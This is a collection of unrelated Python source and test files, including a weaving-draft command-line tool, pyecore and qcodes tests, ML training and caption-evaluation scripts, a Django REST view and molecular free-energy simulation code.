with open(opts.outfile, 'w') as f:
f.write(draft.to_json())
def thread(opts):
draft = load_draft(opts.infile)
instructions.threading(draft, opts.repeats)
def weave(opts):
draft = load_draft(opts.infile)
assert opts.liftplan, "only liftplan supported for now"
save_filename = '.' + opts.infile + '.save'
print("SAVE FILENAME is %r" % save_filename)
instructions.weaving(draft,
repeats=opts.repeats,
start_repeat=opts.start_repeat,
start_pick=opts.start_pick,
save_filename=save_filename)
def tieup(opts):
draft = load_draft(opts.infile)
instructions.tieup(draft)
def stats(opts):
draft = load_draft(opts.infile)
warp_longest, weft_longest = draft.compute_longest_floats()
print("Title:", draft.title)
print("Author:", draft.author)
print("Address:", draft.address)
print("Email:", draft.email)
print("Telephone:", draft.telephone)
print("Fax:", draft.fax)
print("Notes:", draft.notes)
print("Date:", draft.date)
print("***")
print("Warp Threads:", len(draft.warp))
print("Weft Threads:", len(draft.weft))
print("Shafts:", len(draft.shafts))
print("Treadles:", len(draft.treadles))
print("Longest Float (Warp):", warp_longest)
print("Longest Float (Weft):", weft_longest)
def main(argv=sys.argv):
p = argparse.ArgumentParser(description='Weaving utilities.')
subparsers = p.add_subparsers(help='sub-command help')
p_render = subparsers.add_parser(
'render', help='Render a draft.')
p_render.add_argument('infile')
p_render.add_argument('outfile', nargs='?')
p_render.add_argument('--liftplan', action='store_true')
p_render.set_defaults(function=render)
p_convert = subparsers.add_parser(
'convert',
help='Convert between draft file types.')
p_convert.add_argument('infile')
p_convert.add_argument('outfile')
p_convert.add_argument('--liftplan', action='store_true')
p_convert.set_defaults(function=convert)
p_thread = subparsers.add_parser(
'thread',
help='Show threading instructions for a draft.')
p_thread.add_argument('infile')
p_thread.add_argument('--repeats', type=int, default=1)
p_thread.set_defaults(function=thread)
p_weave = subparsers.add_parser(
'weave',
help='Show weaving instructions for a draft.')
p_weave.add_argument('infile')
p_weave.add_argument('--liftplan', action='store_true')
p_weave.add_argument('--repeats', type=int, default=1)
p_weave.add_argument('--start-repeat', type=int, default=1)
p_weave.add_argument('--start-pick', type=int, default=1)
p_weave.set_defaults(function=weave)
p_tieup = subparsers.add_parser(
'tieup',
help='Show tie-up instructions for a draft.')
p_tieup.add_argument('infile')
p_stats = subparsers.add_parser(
'stats',
help='Print stats for a draft.')
p_stats.add_argument('infile')
p_stats.set_defaults(function=stats)
opts, args = p.parse_known_args(argv[1:])
return opts.function(opts)
|
11483524
|
import pytest
from pyecore.ecore import *
def test_intro():
A = EClass('A') # We create metaclass named 'A'
A.eStructuralFeatures.append(EAttribute('myname', EString,
default_value='new_name'))
a1 = A() # We create an instance
assert a1.myname == 'new_name'
a1.myname = 'a_instance'
assert a1.myname == 'a_instance'
assert isinstance(a1, EObject)
assert a1.eClass is A
assert a1.eClass.eClass is EClass.eClass
assert a1.eClass.eClass is a1.eClass.eClass.eClass
assert a1.eClass.eStructuralFeatures
assert a1.eClass.eStructuralFeatures[0].name == 'myname'
assert a1.eClass.eStructuralFeatures[0].eClass is EAttribute.eClass
assert a1.__getattribute__('myname') == 'a_instance'
a1.__setattr__('myname', 'reflexive')
assert a1.__getattribute__('myname') == 'reflexive'
a1.eSet('myname', 'newname')
assert a1.eGet('myname') == 'newname'
with pytest.raises(BadValueError):
a1.myname = 1
def test_instance_abstract_intro():
MyMetaclass = EClass('MyMetaclass')
instance1 = MyMetaclass()
instance2 = MyMetaclass()
assert instance1 is not instance2
assert instance1.eClass.eAttributes == []
MyMetaclass.eStructuralFeatures.append(EAttribute('name', EString))
assert instance1.eClass.eAttributes != []
assert instance1.name is None
instance1.name = 'mystuff'
assert instance1.name == 'mystuff'
instance3 = MyMetaclass(name='myname')
assert instance3.name == 'myname'
|
11483537
|
import numpy as np
import pytest
from qcodes.utils.validators import PermissiveInts
def test_close_to_ints():
validator = PermissiveInts()
validator.validate(validator.valid_values[0])
a = 0
b = 10
values = np.linspace(a, b, b - a + 1)
for i in values:
validator.validate(i)
def test_bad_values():
validator = PermissiveInts(0, 10)
validator.validate(validator.valid_values[0])
a = 0
b = 10
values = np.linspace(a, b, b - a + 2)
for j, i in enumerate(values):
if j == 0 or j == 11:
validator.validate(i)
else:
with pytest.raises(TypeError):
validator.validate(i)
def test_valid_values():
val = PermissiveInts()
for vval in val.valid_values:
val.validate(vval)
|
11483567
|
from persona import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_folder', type=str, default='data/testing',
help='the folder that contains your dataset and vocabulary file')
parser.add_argument('--train_file', type=str, default='train.txt')
parser.add_argument('--dev_file', type=str, default='valid.txt')
parser.add_argument('--dictPath', type=str, default='vocabulary')
parser.add_argument('--save_folder', type=str, default='save/testing')
parser.add_argument('--save_prefix', type=str, default='model')
parser.add_argument('--save_params', type=str, default='params')
parser.add_argument('--output_file', type=str, default='log')
parser.add_argument('--no_save', action='store_true')
parser.add_argument('--cpu', action='store_true')
parser.add_argument('--UNK',type=int,default=0,
help='the index of UNK. UNK+special_word=3.')
parser.add_argument('--special_word', type=int, default=3,
help='default special words include: padding, EOS, EOT.')
parser.add_argument('--fine_tuning', action='store_true')
parser.add_argument('--fine_tunine_model', type=str, default='model')
parser.add_argument('--PersonaNum', type=int, default=2)
parser.add_argument('--SpeakerMode', action='store_true')
parser.add_argument('--AddresseeMode', action='store_true')
parser.add_argument("--batch_size", type=int, default=256)
parser.add_argument("--source_max_length", type=int, default=50)
parser.add_argument("--target_max_length", type=int, default=50)
parser.add_argument("--max_iter", type=int, default=10)
parser.add_argument("--dimension", type=int, default=512)
parser.add_argument("--layers", type=int, default=4)
parser.add_argument("--init_weight", type=float, default=0.1)
parser.add_argument("--alpha", type=int, default=1)
parser.add_argument("--start_halve", type=int, default=6)
parser.add_argument("--thres", type=int, default=5)
parser.add_argument("--dropout", type=float, default=0.2)
args = parser.parse_args()
print(args)
print()
if __name__ == '__main__':
model = persona(args)
model.train()
|
11483672
|
import json
import torch
import random
import numpy as np
from opts import *
from model.Model import Model
from pycocoevalcap.bleu.bleu import Bleu
from pycocoevalcap.rouge.rouge import Rouge
from pycocoevalcap.cider.cider import Cider
from pycocoevalcap.meteor.meteor import Meteor
from torch.utils.data import DataLoader
from utils.dataloader import VideoDataset
from model.transformer.Constants import *
from nltk.translate.bleu_score import corpus_bleu
from model.transformer.Translator import translate_batch
import sys
sys.path.append("utils/pycocoevalcap/")
def pos_emb_generation(visual_feats):
'''
Generate the position embedding input for Transformers.
'''
seq = list(range(1, visual_feats.shape[1] + 1))
src_pos = torch.tensor([seq] * visual_feats.shape[0]).cuda()
return src_pos
def list_to_sentence(list):
sentence = ''
for element in list:
sentence += ' ' + element
return sentence
def test(loader, model, opt, cap_vocab, cms_vocab):
bleu_scores = []
write_to_txt = []
gts = []
res = []
for batch_id, data in enumerate(loader):
fc_feats = data['fc_feats'].cuda()
cap_labels = data['cap_labels'].cuda()
video_ids = data['video_ids']
with torch.no_grad():
# Beam Search Starts From Here
try:
batch_hyp, cms_batch_hyp = translate_batch(model, fc_feats, opt)
except:
continue
# Stack all GTs captions
references = []
for video in video_ids:
video_caps = []
for cap in opt['captions'][video]:
for _ in cap['attribute']:
video_caps.append(cap['final_caption'][1:-1] + _[1][1:-1])
references.append(video_caps)
# Stack all Predicted Captions
hypotheses = []
for cms_predict, predict in zip(cms_batch_hyp, batch_hyp):
_ = []
if CAP_EOS in predict[0]:
sep_id = predict[0].index(CAP_EOS)
else:
sep_id = -1
for word in predict[0][1: sep_id]:
_.append(cap_vocab[str(word)])
if CAP_EOS in cms_predict[0]:
sep_id = cms_predict[0].index(CAP_EOS)
else:
sep_id = -1
for word in cms_predict[0][0: sep_id]:
_.append(cms_vocab[str(word)])
hypotheses.append(_)
# Print out the predicted sentences and GT
for random_id in range(5):
if 0 in batch_hyp[random_id][0]:
stop_idx = batch_hyp[random_id][0].index(EOS)
else:
stop_idx = -1
video_id = video_ids[random_id]
cap = list_to_sentence([cap_vocab[str(widx)] for widx in batch_hyp[random_id][0][1: stop_idx] if widx != 0])
cms = list_to_sentence([cms_vocab[str(widx)] for widx in cms_batch_hyp[random_id][0][: -1] if widx != 0])
cap_gt = list_to_sentence([cap_vocab[str(word.cpu().numpy())] for word in cap_labels[random_id, 1:] if word != 0][0:-1])
_ = str(video_id + ',' + cap + ',' + cms + ',' + cap_gt)
write_to_txt.append(_)
print('Generated Caption:', cap, ' ', 'Generated CMS:', cms)
print('GT Caption:', cap_gt)
print('\n')
print(batch_id, ' ', batch_id * opt['batch_size'], ' out of ', '3010')
# Compute the BLEU-4 score
bleu_1 = corpus_bleu(references, hypotheses, weights=[1, 0, 0, 0])
bleu_2 = corpus_bleu(references, hypotheses, weights=[0.5, 0.5, 0, 0])
bleu_3 = corpus_bleu(references, hypotheses, weights=[0.333, 0.333, 0.333, 0])
bleu_4 = corpus_bleu(references, hypotheses, weights=[0.25, 0.25, 0.25, 0.25])
bleu_scores.append([bleu_1, bleu_2, bleu_3, bleu_4])
print("Bleu scores 1-4:", np.mean(np.asarray(bleu_scores), 0))
def main(opt):
dataset = VideoDataset(opt, 'test')
dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=False)
opt['cms_vocab_size'] = dataset.get_cms_vocab_size()
opt['cap_vocab_size'] = dataset.get_cap_vocab_size()
if opt['cms'] == 'int':
cms_text_length = opt['int_max_len']
elif opt['cms'] == 'eff':
cms_text_length = opt['eff_max_len']
else:
cms_text_length = opt['att_max_len']
model = Model(
dataset.get_cap_vocab_size(),
dataset.get_cms_vocab_size(),
cap_max_seq=opt['cap_max_len'],
cms_max_seq=cms_text_length,
tgt_emb_prj_weight_sharing=True,
vis_emb=opt['dim_vis_feat'],
rnn_layers=opt['rnn_layer'],
d_k=opt['dim_head'],
d_v=opt['dim_head'],
d_model=opt['dim_model'],
d_word_vec=opt['dim_word'],
d_inner=opt['dim_inner'],
n_layers=opt['num_layer'],
n_head=opt['num_head'],
dropout=opt['dropout'])
if len(opt['load_checkpoint']) != 0:
state_dict = torch.load(opt['load_checkpoint'])
model.load_state_dict(state_dict)
model = model.cuda()
model.eval()
test(dataloader, model, opt, dataset.get_cap_vocab(), dataset.get_cms_vocab())
if __name__ == '__main__':
opt = parse_opt()
opt = vars(opt)
opt['captions'] = json.load(open(opt['caption_json']))
opt['batch_size'] = 30
main(opt)
|
11483679
|
from scitools.std import *
def f1(t):
return t**2*exp(-t**2)
def f2(t):
return t**2*f1(t)
t = linspace(0, 3, 51)
y1 = f1(t)
y2 = f2(t)
plot(t, y1, 'r-', t, y2, 'bo',
legend=('t^2*exp(-t^2)', 't^4*exp(-t^2)'),
savefig='plot2j.png')
ax = gca() # get current Axis object
ax.setp(xlabel='t', ylabel='y',
axis=[0, 4, -0.1, 0.6],
title='Plotting two curves in the same plot')
show() # show the plot again after ax.setp actions
print ax.dump()
fig = gcf(); print fig.dump()
raw_input('Press Return key to quit: ')
|
11483703
|
from jinja2 import Environment, PackageLoader
from sqlalchemy import PrimaryKeyConstraint, ForeignKeyConstraint, CheckConstraint, UniqueConstraint
import dbd
from dbd.utils.text_utils import strip_table_name
JINJA_GENERATOR_ENV = Environment(loader=PackageLoader(dbd.__name__, 'generator/generator_templates'))
JINJA_GENERATOR_ENV.globals.update(
len=len, str=str, type=type, isinstance=isinstance,
strip_table_name=strip_table_name,
PrimaryKeyConstraint=PrimaryKeyConstraint,
ForeignKeyConstraint=ForeignKeyConstraint,
CheckConstraint=CheckConstraint,
UniqueConstraint=UniqueConstraint
)
|
11483706
|
from rest_framework import status
from rest_framework.response import Response
from rest_framework.generics import GenericAPIView
from ..permissions import IsAuthenticated
from django.core.cache import cache
from django.conf import settings
from ..authentication import TokenAuthentication
from ..app_settings import (
ShareRightDeclineSerializer,
)
class ShareRightDeclineView(GenericAPIView):
authentication_classes = (TokenAuthentication, )
permission_classes = (IsAuthenticated,)
allowed_methods = ('POST', 'OPTIONS', 'HEAD')
def get(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def put(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def post(self, request, *args, **kwargs):
"""
Mark a Share_right as declined. In addition deletes now unnecessary information like title and encryption key.
:param request:
:param args:
:param kwargs:
:return: 200 / 403
"""
serializer = ShareRightDeclineSerializer(data=request.data, context=self.get_serializer_context())
if not serializer.is_valid():
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
user_share_right_obj = serializer.validated_data.get('user_share_right_obj')
user_share_right_obj.accepted = False
user_share_right_obj.title = ''
user_share_right_obj.title_nonce = ''
user_share_right_obj.type = ''
user_share_right_obj.type_nonce = ''
user_share_right_obj.key_type = ''
user_share_right_obj.key = ''
user_share_right_obj.key_nonce = ''
user_share_right_obj.save()
if settings.CACHE_ENABLE:
cache_key = 'psono_user_status_' + str(user_share_right_obj.user.id)
cache.delete(cache_key)
return Response(status=status.HTTP_200_OK)
def delete(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
|
11483724
|
import threading
import time
import pytest
import torch
from torchgpipe.microbatch import Batch
from torchgpipe.stream import CPUStream
from torchgpipe.worker import Task, spawn_workers
class fake_device:
"""A test double for :class:`torch.device`. Every fake device is different
with each other.
"""
type = 'fake'
index = None
def test_join_running_workers():
count = 0
def counter():
nonlocal count
time.sleep(0.1)
count += 1
return Batch(())
with spawn_workers([fake_device() for _ in range(10)]) as (in_queues, out_queues):
def call_in_worker(i, f):
task = Task(CPUStream, compute=f, finalize=None)
in_queues[i].put(task)
for i in range(10):
call_in_worker(i, counter)
# There's no nondeterminism because 'spawn_workers' joins all running
# workers.
assert count == 10
def test_join_running_workers_with_exception():
class ExpectedException(Exception):
pass
count = 0
def counter():
nonlocal count
time.sleep(0.1)
count += 1
return Batch(())
with pytest.raises(ExpectedException):
with spawn_workers([fake_device() for _ in range(10)]) as (in_queues, out_queues):
def call_in_worker(i, f):
task = Task(CPUStream, compute=f, finalize=None)
in_queues[i].put(task)
for i in range(10):
call_in_worker(i, counter)
raise ExpectedException
# There's no nondeterminism because only 1 task can be placed in input
# queues.
assert count == 10
def test_compute_multithreading():
"""Task.compute should be executed on multiple threads."""
thread_ids = set()
def log_thread_id():
thread_id = threading.current_thread().ident
thread_ids.add(thread_id)
return Batch(())
with spawn_workers([fake_device() for _ in range(2)]) as (in_queues, out_queues):
for i in range(2):
t = Task(CPUStream, compute=log_thread_id, finalize=None)
in_queues[i].put(t)
for i in range(2):
out_queues[i].get()
assert len(thread_ids) == 2
def test_compute_success():
"""Task.compute returns (True, (task, batch)) on success."""
def _42():
return Batch(torch.tensor(42))
with spawn_workers([torch.device('cpu')]) as (in_queues, out_queues):
t = Task(CPUStream, compute=_42, finalize=None)
in_queues[0].put(t)
ok, (task, batch) = out_queues[0].get()
assert ok
assert task is t
assert isinstance(batch, Batch)
assert batch[0].item() == 42
def test_compute_exception():
"""Task.compute returns (False, exc_info) on failure."""
def zero_div():
0/0
with spawn_workers([torch.device('cpu')]) as (in_queues, out_queues):
t = Task(CPUStream, compute=zero_div, finalize=None)
in_queues[0].put(t)
ok, exc_info = out_queues[0].get()
assert not ok
assert isinstance(exc_info, tuple)
assert issubclass(exc_info[0], ZeroDivisionError)
@pytest.mark.parametrize('grad_mode', [True, False])
def test_grad_mode(grad_mode):
def detect_grad_enabled():
x = torch.rand(1, requires_grad=torch.is_grad_enabled())
return Batch(x)
with torch.set_grad_enabled(grad_mode):
with spawn_workers([torch.device('cpu')]) as (in_queues, out_queues):
task = Task(CPUStream, compute=detect_grad_enabled, finalize=None)
in_queues[0].put(task)
ok, (_, batch) = out_queues[0].get()
assert ok
assert batch[0].requires_grad == grad_mode
def test_worker_per_device():
cpu = torch.device('cpu')
cpu0 = torch.device('cpu', index=0)
fake1 = fake_device()
fake2 = fake_device()
with spawn_workers([cpu, cpu, cpu0, fake1, fake2]) as (in_queues, out_queues):
assert len(in_queues) == len(out_queues) == 5
# 0: cpu, 1: cpu, 2: cpu0
assert in_queues[0] is in_queues[1] is in_queues[2]
assert out_queues[0] is out_queues[1] is out_queues[2]
# 3: fake1, 4: fake2
assert in_queues[3] is not in_queues[4]
assert out_queues[3] is not out_queues[4]
|
11483749
|
import operator
import pytest
from ...primitives import Int, Str, Any
from ...containers import List
from ...geospatial import ImageCollection
from ...identifier import parameter
from .. import MaskedArray, Array, DType, Scalar
import numpy as np
from ...core import ProxyTypeError
arr_fixture = [[1, 2], [3, 4]]
mask_fixture = [[True, False], [False, True]]
ma = MaskedArray([[[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]]], False)
def test_init():
ma = MaskedArray(arr_fixture, mask_fixture)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
def test_init_bool_mask():
ma = MaskedArray(arr_fixture, False)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
def test_init_fill_value():
fill_value = 5
ma = MaskedArray(arr_fixture, mask_fixture, fill_value=fill_value)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
fill_value = Array([5, 6])
ma = MaskedArray(arr_fixture, mask_fixture, fill_value=fill_value)
def test_from_numpy():
np_ma = np.ma.masked_array([1, 2, 3], [True, True, False])
ma = MaskedArray.from_numpy(np_ma)
assert isinstance(ma, MaskedArray)
assert isinstance(ma, MaskedArray)
assert ma.params == ()
def test_init_params():
x = parameter("x", Int)
y = parameter("y", Int)
ma = MaskedArray(data=x, mask=mask_fixture, fill_value=y)
assert isinstance(ma, MaskedArray)
assert ma.params == (x, y)
@pytest.mark.parametrize(
"val",
[
[1, 2, 3],
np.array([1, 2, 3]),
np.ma.masked_array([1, 2, 3], [True, True, False]),
Any([1, 2]),
],
)
def test_promote(val):
ma = MaskedArray._promote(val)
assert isinstance(ma, MaskedArray)
@pytest.mark.parametrize(
"val", ["foo", Str("foo"), List[Int]([1, 2, 3]), np.array([1, 2], dtype=np.object)]
)
def test_promote_invalid(val):
with pytest.raises((TypeError, ProxyTypeError)):
MaskedArray._promote(val)
def test_dtype():
assert isinstance(ma.dtype, DType)
def test_ndim():
assert isinstance(ma.ndim, Int)
def test_shape():
assert isinstance(ma.shape, List[Int])
def test_size():
assert isinstance(ma.size, Int)
def test_astype():
assert isinstance(ma.astype("int"), MaskedArray)
assert isinstance(ma.astype(DType(int)), MaskedArray)
def test_flatten():
assert isinstance(ma.flatten(), MaskedArray)
@pytest.mark.parametrize("shape", [(-1,), (1, 2)])
def test_reshape(shape):
assert isinstance(ma.reshape(*shape), MaskedArray)
@pytest.mark.parametrize(
"idx",
[
None,
1,
slice(2),
(0, 0, 0),
(None, 0, 0, 0),
(1, None),
[1, 2],
Array([1, 2]),
Array([True, False]),
Array([[[]]]),
(Array([[[]]]), None),
(0, Array([[]])),
(0, Array([[]]), None),
],
)
def test_getitem(idx):
result = ma[idx]
assert isinstance(result, MaskedArray)
@pytest.mark.parametrize(
"idx, err_type, msg",
[
([1, 2.2], TypeError, r"Invalid types in \[1, 2.2\]"),
(
List[Str]([]),
TypeError,
r"only be sliced with 1D List\[Int\] or List\[Bool\], not List\[Str\]",
),
(
(Array([]), Array([])),
ValueError,
"cannot slice an Array with lists or Arrays in multiple axes",
),
(
([1], [2]),
ValueError,
"cannot slice an Array with lists or Arrays in multiple axes",
),
(
([1], Array([])),
ValueError,
"cannot slice an Array with lists or Arrays in multiple axes",
),
],
)
def test_getitem_error(idx, err_type, msg):
with pytest.raises(err_type, match=msg):
ma[idx]
def test_to_imagery():
assert isinstance(ma.to_imagery(), ImageCollection)
def test_to_imagery_error():
with pytest.raises(TypeError):
ma.to_imagery(properties="foo")
ma.to_imagery(bandinfo=[1, 2, 3])
@pytest.mark.parametrize(
"method",
[
operator.lt,
operator.le,
operator.gt,
operator.ge,
operator.eq,
operator.ne,
operator.add,
operator.sub,
operator.mul,
operator.floordiv,
operator.truediv,
operator.mod,
operator.pow,
],
)
@pytest.mark.parametrize("other", [Array([[1, 2, 3], [4, 5, 6]]), Array(1), 1, 0.5])
def test_container_methods(method, other):
result = method(ma, other)
r_result = method(other, ma)
assert isinstance(result, MaskedArray)
assert isinstance(r_result, MaskedArray)
@pytest.mark.parametrize(
"axis, return_type", [(1, MaskedArray), ((1, 2), MaskedArray), (None, Scalar)]
)
def test_stats(axis, return_type):
assert isinstance(ma.min(axis=axis), return_type)
assert isinstance(ma.max(axis=axis), return_type)
assert isinstance(ma.mean(axis=axis), return_type)
assert isinstance(ma.median(axis=axis), return_type)
assert isinstance(ma.sum(axis=axis), return_type)
assert isinstance(ma.std(axis=axis), return_type)
assert isinstance(ma.count(axis=axis), return_type)
def test_getdata():
arr = ma.getdata()
assert isinstance(arr, Array)
def test_getmaskarray():
arr = ma.getmaskarray()
assert isinstance(arr, Array)
@pytest.mark.parametrize("fill_value", [5, 5.0, True, np.int32(5), np.float64(5), None])
def test_filled(fill_value):
arr = ma.filled(fill_value)
assert isinstance(arr, Array)
def test_compressed():
arr = ma.compressed()
assert isinstance(arr, Array)
|
11483792
|
from __future__ import print_function, unicode_literals
import os
import sys
def data_filename(fname):
basedir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
if os.path.exists(os.path.join(basedir, 'weblabdeusto_data', fname)):
return os.path.join(basedir, 'weblabdeusto_data', fname)
if os.path.exists(os.path.join(sys.prefix, 'weblabdeusto_data', fname)):
return os.path.join(sys.prefix, 'weblabdeusto_data', fname)
elif os.path.exists(os.path.join(basedir, fname)):
return os.path.abspath(os.path.join(basedir, fname))
elif os.path.exists(os.path.join(basedir, '..', '..', 'client', fname)):
return os.path.abspath(os.path.join(basedir, '..', '..', 'client', fname))
else:
return fname
|
11483802
|
import argparse
from data_loader.dataset import MAGDataset
def main(args):
binary_dataset = MAGDataset(name=args.taxon_name, path=args.data_dir, embed_suffix=args.embed_suffix, raw=True,
existing_partition=args.existing_partition, partition_pattern=args.partition_pattern,
shortest_path=args.shortest_path)
if __name__ == '__main__':
args = argparse.ArgumentParser(description='Generate binary data from one input taxonomy')
args.add_argument('-t', '--taxon_name', required=True, type=str, help='taxonomy name')
args.add_argument('-d', '--data_dir', required=True, type=str, help='path to data directory')
args.add_argument('-es', '--embed_suffix', default="", type=str, help='embed suffix indicating a specific initial embedding vectors')
args.add_argument('-p', '--existing_partition', default=1, type=int, help='whether to use the existing train/validation/test partition files')
args.add_argument('-pp', '--partition_pattern', default='internal', type=str, help='how to partition existing train/validation/test files', choices=['internal', 'leaf'])
args.add_argument('-sp', '--shortest_path', default=0, type=int, help='whether to use shortes path margin loss')
args = args.parse_args()
args.existing_partition = (args.existing_partition == 1)
main(args)
|
11483887
|
from collections import namedtuple
import functools
import copy
import jax
import numpy as np
from timemachine.lib import potentials, custom_ops
from typing import Tuple, List, Any
import dataclasses
import jax.numpy as jnp
from fe.topology import BaseTopology, SingleTopology
from fe.free_energy import BaseFreeEnergy
from parallel.client import SerialClient
from md import minimizer
from md.states import CoordsVelBox
from md.barostat.utils import get_bond_list, get_group_indices
from timemachine.lib import LangevinIntegrator, MonteCarloBarostat
@dataclasses.dataclass
class SimulationResult:
xs: np.array
du_dls: np.array
du_dps: np.array
def flatten(v):
return tuple(), (v.xs, v.du_dls, v.du_dps)
def unflatten(aux_data, children):
xs, du_dls, du_dps = aux_data
return SimulationResult(xs, du_dls, du_dps)
jax.tree_util.register_pytree_node(SimulationResult, flatten, unflatten)
def equilibrate(integrator, barostat, potentials, coords, box, lamb, equil_steps) -> Tuple:
all_impls = []
v0 = np.zeros_like(coords)
for bp in potentials:
impl = bp.bound_impl(np.float32)
all_impls.append(impl)
if integrator.seed == 0:
integrator = copy.deepcopy(integrator)
integrator.seed = np.random.randint(np.iinfo(np.int32).max)
if barostat.seed == 0:
barostat = copy.deepcopy(barostat)
barostat.seed = np.random.randint(np.iinfo(np.int32).max)
intg_impl = integrator.impl()
baro_impl = barostat.impl(all_impls)
# context components: positions, velocities, box, integrator, energy fxns
ctxt = custom_ops.Context(
coords,
v0,
box,
intg_impl,
all_impls,
barostat=baro_impl,
)
# equilibration
equil_schedule = np.ones(equil_steps) * lamb
ctxt.multiple_steps(equil_schedule)
return CoordsVelBox(coords=ctxt.get_x_t(), velocities=ctxt.get_v_t(), box=ctxt.get_box())
def simulate(
lamb,
box,
x0,
v0,
final_potentials,
integrator,
equil_steps,
prod_steps,
barostat,
x_interval=1000,
du_dl_interval=5,
) -> SimulationResult:
"""
Run a simulation and collect relevant statistics for this simulation.
Parameters
----------
lamb: float
lambda parameter
box: np.array
3x3 numpy array of the box, dtype should be np.float64
x0: np.array
Nx3 numpy array of the coordinates
v0: np.array
Nx3 numpy array of the velocities
final_potentials: list
list of unbound potentials
integrator: timemachine.Integrator
integrator to be used for dynamics
equil_steps: int
number of equilibration steps
prod_steps: int
number of production steps
x_interval: int
how often we store coordinates. if x_interval == 0 then
no frames are returned.
du_dl_interval: int
how often we store du_dls. if du_dl_interval == 0 then
no du_dls are returned
barostat: timemachine.lib.MonteCarloBarostat
Monte carlo barostat to use when simulating.
Returns
-------
SimulationResult
Results of the simulation.
"""
all_impls = []
bonded_impls = []
nonbonded_impls = []
# set up observables for du_dps here as well.
du_dp_obs = []
for bp in final_potentials:
impl = bp.bound_impl(np.float32)
if isinstance(bp, potentials.Nonbonded):
nonbonded_impls.append(impl)
else:
bonded_impls.append(impl)
all_impls.append(impl)
du_dp_obs.append(custom_ops.AvgPartialUPartialParam(impl, 5))
if integrator.seed == 0:
integrator = copy.deepcopy(integrator)
integrator.seed = np.random.randint(np.iinfo(np.int32).max)
if barostat.seed == 0:
barostat = copy.deepcopy(barostat)
barostat.seed = np.random.randint(np.iinfo(np.int32).max)
intg_impl = integrator.impl()
baro_impl = barostat.impl(all_impls)
# context components: positions, velocities, box, integrator, energy fxns
ctxt = custom_ops.Context(
x0,
v0,
box,
intg_impl,
all_impls,
barostat=baro_impl,
)
base_interval = baro_impl.get_interval()
# Use an interval of 5 for equilibration
baro_impl.set_interval(5)
# equilibration
equil_schedule = np.ones(equil_steps) * lamb
ctxt.multiple_steps(equil_schedule)
baro_impl.set_interval(base_interval)
for obs in du_dp_obs:
ctxt.add_observable(obs)
prod_schedule = np.ones(prod_steps) * lamb
full_du_dls, xs, _ = ctxt.multiple_steps(prod_schedule, du_dl_interval, x_interval)
# keep the structure of grads the same as that of final_potentials so we can properly
# form their vjps.
grads = []
for obs in du_dp_obs:
grads.append(obs.avg_du_dp())
result = SimulationResult(xs=xs.astype("float32"), du_dls=full_du_dls, du_dps=grads)
return result
FreeEnergyModel = namedtuple(
"FreeEnergyModel",
[
"unbound_potentials",
"client",
"box",
"x0",
"v0",
"integrator",
"lambda_schedule",
"equil_steps",
"prod_steps",
"barostat",
],
)
gradient = List[Any] # TODO: make this more descriptive of dG_grad structure
def _deltaG(model, sys_params) -> Tuple[Tuple[float, List], np.array]:
assert len(sys_params) == len(model.unbound_potentials)
bound_potentials = []
for params, unbound_pot in zip(sys_params, model.unbound_potentials):
bp = unbound_pot.bind(np.asarray(params))
bound_potentials.append(bp)
client = model.client
if client is None:
client = SerialClient()
client.verify()
futures = []
for lamb in model.lambda_schedule:
args = (
lamb,
model.box,
model.x0,
model.v0,
bound_potentials,
model.integrator,
model.equil_steps,
model.prod_steps,
model.barostat,
)
kwargs = {} # Unused for now
futures.append(client.submit(simulate, *args, **kwargs))
results = [x.result() for x in futures]
mean_du_dls = []
for result in results:
# (ytz): figure out what to do with stddev(du_dl) later
mean_du_dls.append(np.mean(result.du_dls))
dG = np.trapz(mean_du_dls, model.lambda_schedule)
dG_grad = []
for rhs, lhs in zip(results[-1].du_dps, results[0].du_dps):
dG_grad.append(rhs - lhs)
return (dG, results), dG_grad
@functools.partial(jax.custom_vjp, nondiff_argnums=(0,))
def deltaG(model, sys_params) -> Tuple[float, List]:
return _deltaG(model=model, sys_params=sys_params)[0]
def deltaG_fwd(model, sys_params) -> Tuple[Tuple[float, List], np.array]:
"""same signature as DeltaG, but returns the full tuple"""
return _deltaG(model=model, sys_params=sys_params)
def deltaG_bwd(model, residual, grad) -> Tuple[np.array]:
"""Note: nondiff args must appear first here, even though one of them appears last in the original function's signature!"""
# residual are the partial dG / partial dparams for each term
# grad[0] is the adjoint of dG w.r.t. loss: partial L/partial dG
# grad[1] is the adjoint of dG w.r.t. simulation result, which we don't use
return ([grad[0] * r for r in residual],)
deltaG.defvjp(deltaG_fwd, deltaG_bwd)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.